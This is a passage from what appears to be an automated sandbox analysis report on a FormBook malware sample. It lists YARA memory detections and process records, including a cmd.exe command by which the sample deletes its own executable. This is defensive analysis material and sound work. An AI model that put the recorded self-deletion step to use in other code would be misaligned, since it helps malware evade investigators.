                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.471203600.0000000000D80000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.471203600.0000000000D80000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.471203600.0000000000D80000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        Reputation:moderate

                                                                                                                        General

                                                                                                                        Start time:09:18:47
                                                                                                                        Start date:23/02/2021
                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:/c del 'C:\Users\user\Desktop\lpdKSOB78u.exe'
                                                                                                                        Imagebase:0xc50000
                                                                                                                        File size:232960 bytes
                                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        General

                                                                                                                        Start time:09:18:48
                                                                                                                        Start date:23/02/2021
                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        Imagebase:0x7ff6b2800000
                                                                                                                        File size:625664 bytes
                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        Disassembly

                                                                                                                        Code Analysis

                                                                                                                        Reset < >